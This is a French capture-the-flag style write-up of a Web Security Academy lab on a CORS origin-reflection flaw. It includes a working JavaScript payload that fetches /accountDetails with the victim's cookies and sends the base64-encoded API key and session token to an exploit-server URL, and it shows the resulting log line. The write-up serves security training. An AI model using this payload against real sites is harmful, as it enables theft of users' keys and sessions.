CORS — réflexion basique de l’origine

CORS vulnerability with basic origin reflection

Lab: CORS vulnerability with basic origin reflection | Web Security AcademyWebSecAcademy

Exploiter une configuration CORS trop permissive (le serveur fait confiance à n’importe quelle origine) pour récupérer la clé API de l’administrateur via une requête cross-origin avec credentials et envoyer la réponse vers notre serveur d’exploit. L’exercice est résolu quand la clé API administrateur est soumise à l’exploit server.

Identifiants fournis pour se connecter : wiener:peter.
Le code côté page récupère la clé API depuis /accountDetails et l’affiche :

<script>
 fetch('/accountDetails', {credentials:'include'})
  .then(r => r.json())
  .then(j => document.getElementById('apikey').innerText = j.apikey)
</script>

Les en-têtes indiquent Access-Control-Allow-Credentials: true (le serveur accepte les requêtes avec cookies/credentials).

En testant une requête avec l’en-tête Origin: jord4n.pro, la réponse est retournée (l’origine réfléchie est acceptée).

Origin: jord4n.pro

Le serveur reflète/autorise l’origine envoyée, donc une page contrôlée par l’attaquant peut effectuer une XMLHttpRequest ou fetch vers /accountDetails en incluant les cookies de la victime (withCredentials = true) et récupérer la réponse JSON contenant la clé API.

<script>
  var req=new XMLHttpRequests();
  req.open("GET", "https://0a9d00860350062c82d5244e009500e7.web-security-academy.net/accountDetails", true);
  req.withCredentials = true;
  req.send();
</script>

Une fois la réponse lue, on peut la transmettre au serveur d’exploit (par ex. en encodant en base64) pour la récolte.

<script>
  var req=new XMLHttpRequest();
  req.onload = function(){
     location = "https://exploit-0aca00f703c106bc82ac23560133003f.exploit-server.net/?apiKey=" + btoa(req.responseText);
};
  req.open("GET", "https://0a9d00860350062c82d5244e009500e7.web-security-academy.net/accountDetails", true);
  req.withCredentials = true;
  req.send();
</script>

10.0.3.6        2025-10-29 20:19:37 +0000 "GET /?apiKey=ewogICJ1c2VybmFtZSI6ICJhZG1pbmlzdHJhdG9yIiwKICAiZW1haWwiOiAiIiwKICAiYXBpa2V5IjogIjg2cWk4Mnh2TUdDOUdyV2dYY1RPdUN4bnVCQU9Gd3VEIiwKICAic2Vzc2lvbnMiOiBbCiAgICAiS240MzN2QVpqWU1WUTZTUE1JTmx4YzY5aHFjNVg1M24iCiAgXQp9 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"

Le serveur d’exploit a reçu une requête GET contenant la réponse encodée, par exemple :

Mis à jour il y a 1 mois

Ce contenu vous a-t-il été utile ?